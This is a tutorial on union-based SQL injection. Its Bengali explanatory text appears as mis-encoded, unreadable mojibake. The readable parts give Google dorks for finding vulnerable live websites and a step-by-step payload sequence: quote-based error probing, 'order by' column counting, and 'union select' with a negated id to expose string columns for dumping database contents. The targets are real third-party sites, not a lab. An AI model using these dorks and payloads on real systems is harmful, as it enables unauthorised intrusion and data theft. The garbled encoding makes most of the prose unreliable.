Web Site Hacking : Sql Injection (Union Based)

SQL INJECTION (Union Based SQLi)

āĻ¸āĻŦāĻžāĻ‡ āĻ†āĻļāĻž āĻ•āĻ°āĻŋ āĻ­āĻžāĻ˛ā§‹ āĻ†āĻ›ā§‡āĻ¨āĨ¤
(āĻāĻ‡ āĻŸāĻŋāĻ‰āĻŸā§‹āĻ°āĻŋā§ŸāĻžāĻ˛āĻŸāĻŋ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻļāĻŋāĻ•ā§āĻˇāĻ¨ā§€ā§Ÿ āĻ‰āĻĻā§āĻĻā§āĻ¯ā§‡āĻļā§āĻ¯ā§‡ āĻ˛ā§‡āĻ–āĻž āĻšā§Ÿā§‡āĻ›ā§‡)

āĻāĻ–āĻ¨ āĻĨā§‡āĻ•ā§‡ āĻ†āĻŽāĻŋ SQL INJECTION āĻ¨āĻŋā§Ÿā§‡ āĻ¨āĻŋā§ŸāĻŽāĻŋāĻ¤ āĻŸāĻŋāĻ‰āĻ¨ āĻ˛ā§‡āĻ–āĻžāĻ° āĻšā§‡āĻˇā§āĻŸāĻž āĻ•āĻ°āĻŦā§‹āĨ¤
āĻ†āĻœāĻ•ā§‡ āĻ†āĻŽāĻŋ āĻ†āĻĒāĻ¨āĻžāĻĻā§‡āĻ° āĻ¸āĻžāĻĨā§‡ āĻŦā§‡āĻ¸āĻŋāĻ• āĻ‡āĻ‰āĻ¨āĻŋā§ŸāĻ¨ āĻŦā§‡āĻœāĻĄ SQL INJECTION
āĻ•āĻŋāĻ­āĻžāĻŦā§‡ āĻ•āĻ°āĻž āĻšā§Ÿ āĻ¸ā§‡āĻŸāĻž āĻĻā§‡āĻ–āĻžāĻŦā§‹āĨ¤
āĻāĻŦāĻ‚ āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤ āĻ†āĻ˛ā§‹āĻšāĻ¨āĻž āĻ•āĻ°āĻžāĻ° āĻšā§‡āĻˇā§āĻŸāĻž āĻ•āĻ°āĻŦā§‹ āĻ†āĻļāĻž āĻ•āĻ°āĻŋ āĻ§ā§ˆāĻ°ā§āĻ¯ āĻ¸āĻšāĻ•āĻžāĻ°ā§‡ āĻĒā§œāĻŦā§‡āĻ¨āĨ¤

  • SQL INJECTION āĻ•āĻŋ?

SQL INJECTION  āĻšāĻšā§āĻ›ā§‡ āĻŦāĻ°ā§āĻ¤āĻŽāĻžāĻ¨ āĻ¸āĻŽā§Ÿā§‡āĻ° āĻ“ā§Ÿā§‡āĻŦāĻ¸āĻžāĻ‡āĻŸ āĻšā§āĻ¯āĻžāĻ•āĻŋāĻ‚ āĻ¸āĻŦāĻšā§‡ā§Ÿā§‡ āĻœāĻ¨āĻĒā§āĻ°āĻŋā§Ÿ āĻāĻŦāĻ‚
āĻ•āĻŽāĻ¨ āĻŽā§‡āĻĨāĻĄ/āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĨ¤
āĻ†āĻ¸āĻ˛ā§‡ SQL INJECTION āĻšāĻšā§āĻ›ā§‡ āĻ¤ā§‡āĻŽāĻ¨ āĻ•āĻ āĻŋāĻ¨ āĻœāĻŋāĻ¨āĻŋāĻ¸ āĻ¨āĻž āĻ¤āĻŦā§‡
āĻāĻŸāĻž āĻ­āĻžāĻ˛ā§‹āĻ­āĻžāĻŦā§‡ āĻļāĻŋāĻ–āĻ¤ā§‡ āĻšāĻ˛ā§‡,
āĻāĻŸāĻžāĻ° āĻĒāĻŋāĻ›āĻ¨ā§‡ āĻ†āĻĒāĻ¨āĻžāĻ° āĻ…āĻ¨ā§‡āĻ• āĻ¸āĻŽā§Ÿ āĻĻā§‡āĻ“ā§ŸāĻž āĻ˛āĻžāĻ—āĻŦā§‡āĨ¤

āĻ•āĻŋāĻ¨ā§āĻ¤ā§ āĻšā§āĻ¯āĻžāĻ•āĻŋāĻ‚ āĻ āĻ¨āĻ¤ā§āĻ¨ āĻāĻŽāĻ¨  āĻ…āĻ¨ā§‡āĻ• Newbiee āĻšā§āĻ¯āĻžāĻ•āĻžāĻ° āĻŽāĻ¨ā§‡ āĻ•āĻ°ā§‡ āĻ¯ā§‡ SQL INJECTION āĻ•ā§‹āĻ¨ā§‹ āĻŦāĻĄ āĻŦā§āĻ¯āĻžāĻĒāĻžāĻ° āĻ¨āĻžāĻš
āĻ•āĻžāĻ°āĻŖ āĻ¤āĻžāĻ°āĻž āĻ–ā§āĻŦ āĻ¸āĻšāĻœā§‡āĻ‡ āĻŦāĻŋāĻ­āĻŋāĻ¨ā§āĻ¨ āĻŸā§āĻ˛āĻ¸(Havij,Sqlmap,Sqlninja) āĻ‡āĻ¤ā§āĻ¯āĻžāĻĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ SQL INJECTION  āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡āĨ¤
āĻ•āĻŋāĻ¨ā§āĻ¤ā§ SQL INJECTION  āĻāĻŽāĻ¨ āĻāĻ•āĻŸāĻž āĻœāĻŋāĻ¨āĻŋāĻ¸ āĻ¯ā§‡āĻŸāĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻ•ā§‡ āĻ†āĻĒāĻ¨āĻžāĻ° āĻ¸āĻŽā§āĻĒā§‚āĻ°ā§āĻŖ āĻļāĻŋāĻ–āĻ¤ā§‡ āĻšāĻ˛ā§‡ āĻ…āĻ¨ā§‡āĻ• āĻŦāĻ‡ āĻļā§‡āĻˇ āĻ•āĻ°āĻž āĻ˛āĻžāĻ—āĻŦā§‡ :)
āĻāĻ° āĻŽāĻžāĻ¨ā§‡ āĻŦā§‹āĻāĻž āĻ—ā§‡āĻ˛ā§‹ āĻ¯ā§‡ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻŸā§āĻ˛āĻ¸ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻ†āĻĒāĻ¨āĻŋ āĻ…āĻ¨ā§‡āĻ• āĻ¸āĻžāĻ‡āĻŸ āĻ•āĻŋāĻ¨ā§āĻ¤ā§ SQL INJECTION āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨āĨ¤
āĻ•āĻŋāĻ¨ā§āĻ¤ā§ āĻ¤āĻžāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ†āĻ¸āĻ˛ā§‡āĻ‡ āĻ•ā§‹āĻ¨ā§‹ āĻ˛āĻžāĻ­ āĻšāĻŦā§‡ āĻ¨āĻžāĨ¤
āĻ•āĻžāĻ°āĻŖ āĻ†āĻĒāĻ¨āĻŋ āĻ•āĻŋāĻ›ā§āĻ‡ āĻļāĻŋāĻ–āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨ āĻ¨āĻžāĨ¤
āĻāĻŦāĻ‚ āĻ…āĻ¨ā§‡āĻ• āĻ¸āĻŽā§Ÿ āĻŸā§āĻ˛āĻ¸ āĻĻāĻŋā§Ÿā§‡āĻ“ SQL INJECTION āĻāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻĻā§āĻ°ā§āĻŦāĻ˛/āĻ­ā§āĻ˛āĻ¨āĻžāĻ°ā§‡āĻŦāĻ˛ āĻ¸āĻžāĻ‡āĻŸ āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨ āĻ¨āĻžāĨ¤
āĻ¯āĻžā§Ÿ āĻšā§‹āĻ•āĨ¤

  • SQL INJECTION āĻĻā§āĻŦāĻžāĻ°āĻž āĻ•āĻŋ āĻ•āĻŋ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨ āĻ†āĻĒāĻ¨āĻŋ?
  1. āĻ†āĻĒāĻ¨āĻŋ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡ āĻ¤āĻĨā§āĻ¯ āĻ¤ā§‡ āĻāĻ•ā§āĻ¸ā§‡āĻ¸ āĻ¨āĻŋāĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨āĨ¤
  2. āĻ†āĻĒāĻ¨āĻŋ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡āĻ° āĻ¤āĻĨā§āĻ¯ āĻŽā§‹āĻĄāĻŋāĻĢāĻžāĻ‡ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨āĨ¤
  3. āĻ†āĻĒāĻ¨āĻŋ āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻ˛āĻ—āĻ‡āĻ¨ āĻāĻ°āĻŋā§ŸāĻž āĻŦāĻžāĻ‡āĻĒāĻžāĻ¸ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨āĨ¤
  4. āĻ†āĻĒāĻ¨āĻŋ SQL Server āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‡āĻ¨āĨ¤

āĻ¤āĻžāĻšāĻ˛ā§‡ āĻļā§āĻ°ā§ āĻ•āĻ°āĻž āĻ¯āĻžāĻ•āĨ¤

āĻĒā§āĻ°āĻĨāĻŽāĻ¤ āĻ†āĻŽāĻžāĻĻā§‡āĻ° SQL INJECTION āĻāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻ­ā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻ‡āĻŸ āĻŦā§‡āĻ° āĻ•āĻ°āĻ¤ā§‡ āĻšāĻŦā§‡āĨ¤
āĻ¯āĻĻāĻŋ āĻ†āĻĒāĻ¨āĻŋ āĻšā§āĻ¯āĻžāĻ•āĻžāĻ° āĻšāĻ¨,āĻ¤āĻžāĻšāĻ˛ā§‡ āĻ†āĻĒāĻ¨āĻŋ āĻ­āĻžāĻ˛ā§‹ āĻ•āĻ°ā§‡āĻ‡ āĻœāĻžāĻ¨āĻŦā§‡āĻ¨ āĻ¯ā§‡ āĻ¸āĻžāĻ°ā§āĻš āĻ‡āĻžā§āĻœāĻŋāĻ¨ āĻšāĻ˛ā§‹ āĻšā§āĻ¯āĻžāĻ•āĻžāĻ°āĻĻā§‡āĻ°
āĻ¸āĻŦāĻšā§‡ā§Ÿā§‡ āĻŦā§‡āĻ¸ā§āĻŸ āĻĢā§āĻ°ā§‡āĻ¨ā§āĻĄāĨ¤āĻ†āĻŽāĻ°āĻž SQL INJECTION āĻ­ā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻ‡āĻŸ GOOGLE Dork
āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻŦā§‡āĻ° āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‹āĨ¤
āĻ¨āĻŋāĻšā§‡ āĻ†āĻŽāĻŋ āĻ•āĻŋāĻ›ā§ āĻ•āĻŽāĻ¨ SQL INJECTION Dork āĻĻāĻŋāĻšā§āĻ›āĻŋāĻƒ

inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

Dork āĻ†āĻ°ā§‹ āĻ…āĻ¨ā§‡āĻ• āĻŦāĻĄ āĻŦāĻŋāĻļāĻžāĻ˛ āĻ˛āĻŋāĻ¸ā§āĻŸ āĻ†āĻ›ā§‡āĨ¤ āĻĒāĻ°ā§‡ āĻ•ā§‹āĻ¨ā§‹ āĻāĻ• āĻ¸āĻŽā§Ÿ āĻļā§‡ā§ŸāĻžāĻ° āĻ•āĻ°āĻŦā§‹āĨ¤
āĻ…āĻĨāĻŦāĻž āĻ†āĻĒāĻ¨āĻŋ āĻ—ā§āĻ—āĻ˛ āĻĨā§‡āĻ•ā§‡ āĻ¸āĻžāĻ°ā§āĻš āĻ•āĻ°ā§‡ āĻŦā§‡āĻ° āĻ•āĻ°ā§‡ āĻ¨āĻŋāĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡āĻ¨āĨ¤

āĻāĻ–āĻ¨ āĻ†āĻĒāĻ¨āĻŋ āĻāĻ–āĻžāĻ¨ āĻĨā§‡āĻ•ā§‡ āĻ¯ā§‡āĻ•ā§‹āĻ¨ā§‹ āĻāĻ•āĻŸāĻŋ Dork āĻ¨āĻŋā§Ÿā§‡ āĻ—ā§āĻ—āĻ˛ā§‡ āĻ¸āĻžāĻ°ā§āĻš āĻĻāĻŋāĻ˛ā§‡
āĻ°ā§‡āĻ¸āĻžāĻ˛ā§āĻŸā§‡ āĻ…āĻ¨ā§‡āĻ• āĻ¸āĻžāĻ‡āĻŸ āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‡āĻ¨āĨ¤
āĻ¸ā§‡āĻ–āĻžāĻ¨ āĻĨā§‡āĻ•ā§‡ āĻ¯ā§‡āĻ•ā§‹āĻ¨ā§‹ āĻāĻ•āĻŸāĻŋ āĻ¸āĻžāĻ‡āĻŸā§‡ āĻĒā§āĻ°āĻŦā§‡āĻļ āĻ•āĻ°ā§āĻ¨āĨ¤

āĻŽāĻ¨ā§‡ āĻ•āĻ°ā§āĻ¨ āĻāĻ°āĻ•āĻŽ āĻāĻ•āĻŸāĻŋ āĻ¸āĻžāĻ‡āĻŸ āĻĒā§‡āĻ˛ā§‡āĻ¨ āĻ†āĻĒāĻ¨āĻŋ (āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖ)
website.com/index.php?id=1

āĻāĻ‡ āĻ‡āĻ‰āĻ†āĻ°āĻāĻ˛ āĻŸāĻŋ āĻ…āĻ¨ā§‡āĻ• āĻ°āĻ•āĻŽā§‡āĻ° āĻšāĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡āĨ¤ āĻ¤āĻŦā§‡ āĻ†āĻŽāĻŋ āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖā§‡āĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻāĻŸāĻŋ āĻĻā§‡āĻ–āĻžāĻ˛āĻžāĻŽāĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž āĻŸā§‡āĻ¸ā§āĻŸ āĻ•āĻ°āĻŦā§‹ āĻ¸āĻžāĻ‡āĻŸāĻŸāĻŋ SQL INJECTION āĻ­ā§āĻ˛āĻ¨āĻ°āĻžāĻŦāĻ˛ āĻ•āĻŋāĻ¨āĻžāĨ¤
āĻ¤āĻžāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻ†āĻŽāĻŋ āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻļā§‡āĻˇā§‡ āĻāĻ‡ (') āĻšāĻŋāĻšā§āĻ¨āĻŸāĻŋ āĻĻāĻŋāĻŦā§‹ (āĻŦā§āĻ°āĻžāĻ•ā§‡āĻŸā§‡āĻ° āĻŽāĻžāĻāĻ–āĻžāĻ¨ā§‡āĻ° āĻšāĻŋāĻšā§āĻ¨āĻŸāĻŋ)
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
website.com/index.php?id=1'

āĻāĻ–āĻ¨ āĻ¯āĻĻāĻŋ āĻ¸āĻžāĻ‡āĻŸāĻŋ SQL INJECTION āĻāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻ­ā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻšā§Ÿ āĻ¤āĻžāĻšāĻ˛ā§‡
āĻ†āĻĒāĻ¨āĻŋ āĻāĻ°āĻ•āĻŽ āĻ•āĻŋāĻ›ā§ āĻāĻ°āĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‡āĻ¨āĨ¤
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
āĻ…āĻĨāĻŦāĻž,
Warning: mysql_fetch_array()
āĻ…āĻĨāĻŦāĻž āĻ†āĻĒāĻ¨āĻŋ āĻ¯āĻĻāĻŋ āĻ•ā§‹āĻ¨ā§‹ āĻ°āĻ•āĻŽā§‡āĻ° mysql āĻāĻ°āĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻ¨āĨ¤
āĻ…āĻĨāĻŦāĻž āĻ¯āĻĻāĻŋ āĻ¸ā§‡āĻ‡ āĻ“ā§Ÿā§‡āĻŦ āĻĒā§‡āĻ‡āĻœ āĻĨā§‡āĻ•ā§‡ āĻ•ā§‹āĻ¨ā§‹ āĻĄāĻžāĻŸāĻž āĻŽāĻŋāĻ¸ āĻ•āĻ°ā§‡ āĻ¤āĻžāĻšāĻ˛ā§‡ āĻŦā§āĻāĻ¤ā§‡ āĻšāĻŦā§‡
āĻ¸āĻžāĻ‡āĻŸāĻŸāĻŋ SQL INJECTION āĻ­ā§āĻ˛āĻ¨āĻ°āĻžāĻŦāĻ˛āĨ¤

āĻ¯āĻĻāĻŋ āĻāĻ¸āĻŦā§‡āĻ° āĻ•āĻŋāĻ›ā§ āĻ¨āĻž āĻšā§Ÿ āĻ¤āĻžāĻšāĻ˛ā§‡ āĻ¸āĻžāĻ‡āĻŸāĻŸāĻŋ āĻ­ā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¨āĻžāĻš!
āĻ…āĻ¨ā§āĻ¯ āĻ†āĻ°ā§‡āĻ•āĻŸāĻŋ āĻ¸āĻžāĻ‡āĻŸ āĻ–ā§āĻœā§āĻ¨āĨ¤

āĻāĻ°āĻ° āĻĒāĻžāĻ“ā§ŸāĻžāĻ° āĻĒāĻ°ā§‡ āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ•āĻžāĻœ āĻšāĻŦā§‡ āĻ¸āĻžāĻ‡āĻŸāĻŸāĻŋ āĻ•āĻŋ āĻāĻ•ā§āĻ¸āĻĒā§āĻ˛āĻ‡āĻŸāĻŋāĻ‚ āĻ•āĻ°āĻžāĻ° āĨ¤
āĻŽāĻžāĻ¨ā§‡ SQL INJECTION āĻ•āĻ°āĻ¤ā§‡ āĻšāĻŦā§‡āĨ¤

āĻ†āĻŽāĻ°āĻž āĻāĻ¤āĻ•ā§āĻˇāĻ¨ āĻ­ā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻ‡āĻŸ āĻŦā§‡āĻ° āĻ•āĻ°āĻ˛āĻžāĻŽ,āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ•āĻžāĻœ āĻšāĻŦā§‡ āĻ¸āĻžāĻ‡āĻŸāĻŸāĻŋ āĻĨā§‡āĻ•ā§‡ āĻĄāĻžāĻŸāĻž
āĻĄāĻžāĻŽā§āĻĒ āĻ•āĻ°āĻž āĻŦāĻž āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻžāĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻĒāĻ°āĻŦāĻ°ā§āĻ¤ā§€ āĻĒāĻĻāĻ•ā§āĻˇā§‡āĻĒ āĻšāĻŦā§‡ āĻāĻ‡ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡āĻ° āĻŸā§‡āĻŦāĻŋāĻ˛ā§‡ āĻ•āĻ˛āĻžāĻŽā§‡āĻ° āĻ¸āĻ‚āĻ–ā§āĻ¯āĻž āĻ•āĻ¤ā§‹ āĻ¸ā§‡āĻŸāĻž āĻŦā§‡āĻ° āĻ•āĻ°āĻžāĨ¤
āĻ¸ā§‡āĻœāĻ¨ā§āĻ¯ā§‡ āĻ†āĻŽāĻ°āĻž ' āĻšāĻŋāĻšā§āĻ¨ āĻŸāĻŋ order by statement āĻ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻ•āĻ°āĻŦā§‹āĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

āĻ†āĻŽāĻžāĻĻā§‡āĻ° order by āĻāĻ° āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻŸāĻŋ āĻŦāĻžāĻĄāĻŋā§Ÿā§‡ āĻ¯ā§‡āĻ¤ā§‡ āĻšāĻŦā§‡ āĻ¯āĻ¤āĻ•ā§āĻˇāĻ¨ āĻ¨āĻž āĻ†āĻŽāĻ°āĻž
āĻ¸āĻžāĻ‡āĻŸāĻŸāĻŋ āĻ¤ā§‡ āĻ•ā§‹āĻ¨ā§‹ āĻāĻ°āĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻ¨āĻž āĻĒāĻžā§ŸāĨ¤
āĻāĻ°āĻ° āĻ…āĻ¨ā§‡āĻ•āĻŸāĻž āĻāĻ°āĻ•āĻŽ āĻšāĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡,
unknown column numbers
āĻ…āĻĨāĻŦāĻž
āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻ•āĻŋāĻ›ā§ āĻĄāĻžāĻŸāĻž āĻŽāĻŋāĻ¸ āĻšāĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡āĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php?id=20 order by 1-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21-- ERROR āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻ•āĻ¨āĻŸā§‡āĻ¨ā§āĻŸ āĻŽāĻŋāĻ¸ āĻšāĻšā§āĻ›ā§‡āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻ°āĻž order by 21 āĻĒāĻ°ā§āĻ¯āĻ¨ā§āĻ¤ āĻ†āĻ¸āĻžāĻ° āĻĒāĻ° error āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒā§‡āĻ˛āĻžāĻŽāĨ¤
āĻ•āĻŋāĻ¨ā§āĻ¤ā§ order by 20 āĻĻāĻŋāĻ˛ā§‡ āĻ•ā§‹āĻ¨ā§‹ āĻāĻ°āĻ° āĻ¨ā§‡āĻ‡āĨ¤
āĻ¤āĻžāĻ° āĻŽāĻžāĻ¨ā§‡ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡ ā§¨ā§Ļ āĻŸāĻŋ āĻ•āĻ˛āĻžāĻŽ āĻ†āĻ›ā§‡āĨ¤
āĻ…āĻ¨ā§‡āĻ• āĻ¸āĻŽā§Ÿ order by 1000 āĻĻāĻŋāĻ˛ā§‡āĻ“ āĻāĻ°āĻ° āĻ†āĻ¸ā§‡ āĻ¨āĻžāĻšāĨ¤
āĻ¸ā§‡ āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡ id / parameter āĻāĻ° āĻļā§‡āĻˇā§‡ ' āĻšāĻŋāĻšā§āĻ¨ āĻŸāĻŋ āĻĻāĻŋāĻ¤ā§‡ āĻšā§Ÿ
āĻāĻŦāĻ‚ āĻļā§‡āĻˇā§‡ āĻāĻ•āĻŸāĻŋ + āĻ¯ā§‹āĻ— āĻ•āĻ°āĻ¤ā§‡ āĻšā§ŸāĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php?id=20' order by 21--+
āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻœāĻžāĻ¨āĻž āĻ†āĻ›ā§‡ āĻ¯ā§‡ āĻāĻ‡ āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ā§‡ ā§¨ā§ĻāĻŸāĻŋ āĻ•āĻ˛āĻžāĻŽ āĻ†āĻ›ā§‡āĨ¤
āĻāĻ–āĻ¨ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ•āĻžāĻœ āĻšāĻŦā§‡ āĻ¸āĻŦ āĻ•āĻ˛āĻžāĻŽ āĻ¸āĻŋāĻ˛ā§‡āĻ•ā§āĻŸ āĻ•āĻ°āĻž union select statement āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĨ¤
select statement āĻŸāĻŋ Data āĻĻā§‡āĻ–āĻžāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻž āĻšā§ŸāĨ¤

āĻ¯āĻžā§Ÿ āĻšā§‹āĻ• āĻāĻ° āĻĒāĻ°ā§āĻ¯āĻžā§Ÿā§‡ āĻ†āĻŽāĻ°āĻž āĻāĻ‡ āĻ•ā§‹āĻĄāĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻŦā§‹āĨ¤
http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

āĻāĻ–āĻ¨ āĻ†āĻŽāĻ°āĻž āĻ“ā§Ÿā§‡āĻŦ āĻĒā§‡āĻ‡āĻœā§‡ āĻ•āĻŋāĻ›ā§ āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‹āĨ¤
āĻ¨āĻŽā§āĻŦāĻ° āĻ—ā§āĻ˛ā§‹ ā§§-ā§¨ā§Ļ āĻāĻ° āĻŽāĻ§ā§āĻ¯ā§‡ āĻšāĻŦā§‡ āĻ•āĻžāĻ°āĻŖ āĻ†āĻŽāĻ°āĻž āĻœāĻžāĻ¨āĻŋ āĻāĻ‡ āĻ¸āĻžāĻ‡āĻŸā§‡āĻ° āĻ•āĻ˛āĻžāĻŽ ā§¨ā§Ļ āĻŸāĻŋāĨ¤
āĻ†āĻ° āĻ†āĻŽāĻ°āĻž āĻ¯ā§‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄāĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋ āĻ¸ā§‡āĻŸāĻž āĻĻāĻŋā§Ÿā§‡ ā§¨ā§ĻāĻŸāĻŋ āĻ•āĻ˛āĻžāĻŽā§‡āĻ° āĻŽāĻ§ā§āĻ¯ā§‡ āĻ•ā§‹āĻ¨āĻŸāĻŋ
String āĻ•āĻ˛āĻžāĻŽ āĻ¸ā§‡āĻŸāĻž āĻŦā§‡āĻ° āĻ•āĻ°āĻžāĻ° āĻœāĻ¨ā§āĻ¯ā§‡ āĻāĻ‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻŸāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋāĨ¤
āĻ¯āĻĻāĻŋ āĻ†āĻĒāĻ¨āĻŋ āĻ•ā§‹āĻ¨ā§‹ āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻ¨āĻž āĻĒāĻžāĻ¨ āĻ¤āĻžāĻšāĻ˛ā§‡
parameter value āĻāĻ° āĻ†āĻ—ā§‡ āĻāĻ•āĻŸāĻŋ - āĻšāĻŋāĻšā§āĻ¨ āĻĻā§‡āĻ¨āĨ¤
āĻ‰āĻĻāĻžāĻšāĻžāĻ°āĻŖāĻƒ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

āĻ†āĻĒāĻ¨āĻŋ āĻ“ā§Ÿā§‡āĻŦāĻĒā§‡āĻ‡āĻœā§‡ āĻ•āĻŋāĻ›ā§ āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒāĻžāĻŦā§‡āĻ¨āĨ¤
āĻ†āĻŽāĻŋ ā§Š,ā§Ē āĻĻā§‡āĻ–āĻ¤ā§‡ āĻĒā§‡āĻ˛āĻžāĻŽāĨ¤
āĻāĻ‡ āĻĻā§āĻ‡āĻŸāĻž āĻšāĻ˛ā§‹ String Column āĻ†āĻŽāĻ°āĻž āĻĄāĻžāĻŸāĻžāĻŦā§‡āĻ¸ āĻĨā§‡āĻ•ā§‡ āĻ¤āĻĨā§āĻ¯ āĻšā§āĻ¯āĻžāĻ• āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŦā§‹
āĻāĻ‡ āĻĻā§āĻ‡āĻŸāĻŋ āĻ•āĻ˛āĻžāĻŽ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĨ¤
